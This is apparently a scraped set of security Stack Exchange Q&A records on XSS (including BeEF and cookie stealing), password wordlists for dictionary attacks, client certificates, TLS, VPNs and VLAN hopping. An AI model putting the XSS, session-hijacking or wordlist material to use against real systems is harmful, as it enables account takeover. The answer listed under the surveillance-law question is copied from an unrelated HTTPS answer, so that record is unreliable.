</script>">http://victim/displayHelp.php?title=FAQ</a> Persistent Once you are able to persist an XSS vector the attack becomes much more dangerous very fast. A persistent XSS is reflected back to you from the server, usually because the XSS has been stored in a database field or similar. Consider the following input is stored to database and then presented back to you on your profile: <input type="text" value="Your name" /> If you are able to make the application accept and store unsanitized input, all you have to do is make other users view your profile (or where the XSS is reflected back). These kinds of XSS can be not only hard to spot, but very devastating to the system. Just take a look at the XSS worm called Samy worm ! In the early days of XSS you saw this kind of exploit all over guestbooks, communities, user reviews, chat rooms and so on. Two attack vectors Now that you know the different ways of delivering a XSS payload I'd like to mention a few XSS attack vectors that can be very dangerous: XSS defacement XSS defacement is not a hard feat to accomplish. If the XSS is persistent as well, it can be a hassle for the sysadmins to figure it out. Take a look at RSnake Stallowned "attack" which took out Amazon's book preview feature. Quite funny reading. Cookie stealing and session hijacking As in one of the examples above, once you can access users' cookies you can also grab sensitive information. Capturing sessionID's can lead to session hijacking, which in turn can lead to elevated privileges on the system. Sorry about the long post. I'll stop now. As you can see though, XSS is a very big topic to cover. I hope I made it a bit clearer for you, though. Exploiting XSS with BeEF To easy see how XSS can be exploited I recommend trying out BeEF , Browser Exploitation Framework. Once it's unpacked and run on a webserver with PHP support, you can easily try spawning a simulation of a victim (called a zombie) where you can very easy try out different XSS payloads. To mention some: Portscan local network Pingsweep local network Send virus infected applet, signed and ready Send messages to client Make a Skype call The list goes on. Recommend seeing the video on the BeEF homepage. UPDATE: I've done a write up on XSS on my blog which describes XSS. It contains a bit about the history of XSS, the different attack types and some use-cases including BeEF and Shank. | {
"source": [
"https://security.stackexchange.com/questions/1368",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/213/"
]
} |
1,376 | I’m wondering where I can find good collections of dictionaries which can be used for dictionary attacks? I've found some through Google, but I’m interested in hearing about where you get your dictionaries from. | Nice list collected by Ron Bowes you can find here: https://wiki.skullsecurity.org/index.php/Passwords Other list is from InsidePro: https://web.archive.org/web/20120207113205/http://www.insidepro.com/eng/download.shtml . | {
"source": [
"https://security.stackexchange.com/questions/1376",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/294/"
]
} |
1,430 | Client browser certificates seem to be a nice way to protect sites from intruders - it is impossible to guess and should be harder to steal. Of course, they do not solve all the problems, but they add security. However, I didn't encounter any public sites using them. Are there sites that use them? Is there some flaw in them that precludes the usage even when security is important or some other reason why there's so little usage of them? | Client side certificated just haven't had a good enough cost/benefit tradeoff. They are very confusing to users so support costs go up. And they are still just bits and thus "something you know" and are vulnerable to a range of software attacks on the browser, the distribution scheme, phishing etc. Hardware token schemes (two-factor authn) are better for good authn. Single-sign-on (SSO) schemes, potentially federated, and potentially backed by hardware tokens, solve more issues and are easier to deploy. Managing a lot of certificates would be far more complicated for a user than the current thorny multiple-password issue, and browsers don't offer good support for selecting the right certificate. And if a user uses a single cert for lots of sites, then there are privacy issues since use of the certificate identifies the user. Over the decades, a lot of us have thought that the age of end-user PK-crypto was just around the corner, especially those like me enamored of the beauty of RSA. It just turns out that the way it has evolved, the help desk and development costs and subtleties and complexities and legal entanglements of real-world PKI keep eating up the benefits. Equipment seems more expensive than bits, but not if the bits don't do the job, or effective use of them eats up productivity. | {
"source": [
"https://security.stackexchange.com/questions/1430",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/667/"
]
} |
1,438 | I am setting up a web service through which my company will talk to a number of business customers' services. We will be exchanging information using SOAP. I would like to handle authentication with SSL certificates provided by both parties, but I'm a bit lost on whether there's a fundamental difference between the types of certificates. When people talk about HTTPS, they talk about getting an SSL certificate from Verisign or another authority. When they talk about client-side authentication, they talk about getting an X.509 certificate. Are these two words for the same thing, can one be turned into the other, or is some other difference that I'm not grasping? | An X509 Certificate is a type of public key in a public/private key pair. These key pairs can be used for different things, like encryption via SSL, or for identification. SSL Certificates are a type of X509 certificate. SSL works by encrypting traffic as well as verifying the party (Verisign trusts this website to be who they say they are, therefore you probably could too). Verisign acts as a Certificate Authority (CA). The CA is trusted in that everything that it says should be taken as truth (Running a CA requires major security considerations). Therefore if a CA gives you a certificate saying that it trusts that you are really you, you have a user certificate/client certificate. Some of these types of certificates can be used across the board, but others can only be used for certain activities. If you open a certificate in Windows (browse to something over SSL in IE and look at the certificate properties) or run certmgr.msc and view a certificate, look at the Details tab > Key Usage. That will dictate what the certificate is allowed to do/be used for. For SOAP, the certificate can be used for two things: identification and encryption. Well, three if you include message signatures (message hashing). Client certificates identify the calling client or user. When the application makes a SOAP request, it hands the certificate to the web service to tell it who is making the request. | {
"source": [
"https://security.stackexchange.com/questions/1438",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/913/"
]
} |
1,476 | I would like to design a client-server application where the server is placed on Internet. I assume that I could set up the client-server connection using VPN (is it using IPSec?) or using a SSL connection (possibly https). What are the differences between VPN/IPsec and SSL/https for securing a client server connection over Internet? | VPN means "Virtual Private Network". It is a generic concept which designates a part of a bigger network (e.g. the Internet at large) which is logically isolated from the bigger network through non-hardware means (that's what "virtual" means): it is not that we are using distinct cables and switches; rather, isolation is performed through use of cryptography. SSL (now known as TLS) is a technology which takes a bidirectional transport medium and provides a secured bidirectional medium. It requires the underlying transport medium to be "mostly reliable" (when not attacked, data bytes are transferred in due order, with no loss and no repetition). SSL provides confidentiality, integrity (active alterations are reliably detected), and some authentication (usually server authentication, possibly mutual client-server authentication if using certificates on both sides). So VPN and SSL are not from the same level. A VPN implementation requires some cryptography at some point. Some VPN implementations actually use SSL, resulting in a layered system: the VPN transfers IP packets (of the virtual network) by serializing them on a SSL connection, which itself uses TCP as a transport medium, which is built over IP packets (on the physical unprotected network). IPsec is another technology which is more deeply integrated in the packets, which suppresses some of those layers, and is thus a bit more efficient (less bandwidth overhead). On the other hand, IPsec must be managed quite deep within the operating system network code, while a SSL-based VPN only needs some way to hijack incoming and outgoing traffic; the rest can be down in user-level software. As I understand your question, you have an application where some machines must communicate over the Internet. You have some security requirements, and are thinking about either using SSL (over TCP over IP) or possibly HTTPS (which is HTTP-over-SSL-over-TCP-over-IP), or setting up a VPN between client and server and using "plain" TCP in that private network (the point of the VPN is that is gives you a secure network where you need not worry anymore about confidentiality). With SSL, your connection code must be aware of the security; from a programming point of view, you do not open a SSL connection as if it was "just a socket". Some libraries make it relatively simple, but still, you must manage security at application level. A VPN, on the other hand, is configured at operating system level, so the security is not between your application on the client and your application on the server, but between the client operating system and the server operating system: that's not the same security model, although in many situations the difference turns out not to be relevant. In practice, a VPN means that some configuration step is needed on the client operating system. It is quite invasive. Using two VPN-based applications on the same client may be problematic (security-wise, because the client then acts as a bridge which links together two VPN which should nominally be isolated from each other, and also in practice, because of collisions in address space). If the client is a customer, having him configure a VPN properly looks like an impossible task. However , a VPN means that applications need not be aware of security, so this makes it much easier to integrate third-party software within your application. | {
"source": [
"https://security.stackexchange.com/questions/1476",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69/"
]
} |
1,518 | Firesheep has brought the issue of insecure cookie exchanges to the forefront. How can you ensure that all cookie exchanges are forced to occur only via an SSL-secured connection to the server when you're communicating to a web user? Our scenario is that the web app is written in ASP.NET 4.0 and hosted on Windows Server 2008 R2 running IIS 7.5 if that narrows the scope some. | You can use app.config to force it; the format is (in the <system.web> section) <httpCookies domain="String"
httpOnlyCookies="true|false"
requireSSL="true|false" /> so you really want, at a minimum <httpCookies requireSSL='true'/> But preferably you'll also turn httpOnlyCookies on, unless you're doing some really hooky javascript. | {
"source": [
"https://security.stackexchange.com/questions/1518",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/979/"
]
} |
1,525 | It's often said that HTTPS SSL/TLS connections are encrypted and said to be secure because the communication between the server and me is encrypted (also provides server authentication) so if someone sniffs my packets, they will need zillions of years to decrypt if using brute force in theory. Let's assume I'm on a public wifi and there is a malicious user on the same wifi who sniffs every packet. Now let's assume I'm trying to access my gmail account using this wifi. My browser does a SSL/TLS handshake with the server and gets the keys to use for encryption and decryption. If that malicious user sniffed all my incoming and outgoing packets. Can he calculate the same keys and read my encrypted traffic too or even send encrypted messages to the server in my name? | HTTPS is secure over public hotspots. Only a public key and encrypted messages are transmitted (and these too are signed by root certificates) during the setup of TLS , the security layer used by HTTPS. The client uses the public key to encrypt a master secret, which the server then decrypts with its private key. All data is encrypted with a function that uses the master secret and pseudo-random numbers generated by each side. Thus, the data is secure because it is signed by the master secret and pseudo-random numbers the master secret and pseudo-random numbers are secure because it uses public-private key encryption when the TLS handshake occurs the public-private key encryption is secure because: the private keys are kept secret public-private key encryption is designed to be useless without the private key the public keys are known to be legitimate because they are signed by root certificates, which either came with your computer or were specifically authorized by you (pay attention to browser warnings!) Thus, your HTTPS connections and data are safe as long as: you trust the certificates that come with your computer, you take care to only authorize certificates that you trust. | {
"source": [
"https://security.stackexchange.com/questions/1525",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11662/"
]
} |
1,533 | What issues will we face with the use of network surveillance tool in the company network with respect to the Telecommunication Interception Act and Privacy Act ? And what policies could be implemented to mitigate these issues ? | HTTPS is secure over public hotspots. Only a public key and encrypted messages are transmitted (and these too are signed by root certificates) during the setup of TLS , the security layer used by HTTPS. The client uses the public key to encrypt a master secret, which the server then decrypts with its private key. All data is encrypted with a function that uses the master secret and pseudo-random numbers generated by each side. Thus, the data is secure because it is signed by the master secret and pseudo-random numbers the master secret and pseudo-random numbers are secure because it uses public-private key encryption when the TLS handshake occurs the public-private key encryption is secure because: the private keys are kept secret public-private key encryption is designed to be useless without the private key the public keys are known to be legitimate because they are signed by root certificates, which either came with your computer or were specifically authorized by you (pay attention to browser warnings!) Thus, your HTTPS connections and data are safe as long as: you trust the certificates that come with your computer, you take care to only authorize certificates that you trust. | {
"source": [
"https://security.stackexchange.com/questions/1533",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/993/"
]
} |
1,551 | I have a network, where a have a couple of VLANS. There is a firewall between the 2 VLANs. I am using HP Procurve switches and have made sure that switch-to-switch links accept tagged frames only and that host ports don't accept tagged frames (They are not "VLAN Aware"). I've also made sure that the trunk ports don't have a native VLAN. I've also enabled "Ingress Filtering". Furthermore, I've made sure that host ports are only members of a single VLAN, which is the same as the PVID of the respective port. The only ports which are members of multiple VLANs are the trunk ports. Can someone please explain to me why the above isn't secure? I believe I've addressed the double tagging issue.. Update: Both switches are Hp Procurve 1800-24G This question was IT Security Question of the Week . Read the Apr 20, 2012 blog entry for more details or submit your own Question of the Week. | VLAN:s are not inherently insecure. I'm writing this from a service provider perspective, where VLANs are the technology used in 99% (statistics made up on the spot) of cases to segment different customers from each other. Residential customers from each other, residential customers from enterprise leased lines, enterprise VPNs from each other, you name it. The VLAN hopping attacks that exist all depend on a few factors; The switch speaks some kind of trunk protocol to you, allowing you to "register" for a different VLAN. This should never, ever occur on a customer port, or someone should get fired. The port is a tagged port, and the switch isn't protected against double tagged packets. This is only an issue if you have customers on VLAN-tagged ports, which you shouldn't. Even then, it's only an issue if you allow untagged packets on trunk ports between switches which, again, you shouldn't. The "packets travel on the same wire" reasoning is valid, if the attacker has access to the physical wire in question. If that's the case, you have a lot bigger problems than what VLANs can solve. So, by all means use VLANs as a security measure, but make sure that you never, ever speak VLAN tags with the entities you want segmented from each other, and do keep track of which switch features are enabled on ports facing such entities. | {
"source": [
"https://security.stackexchange.com/questions/1551",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1001/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.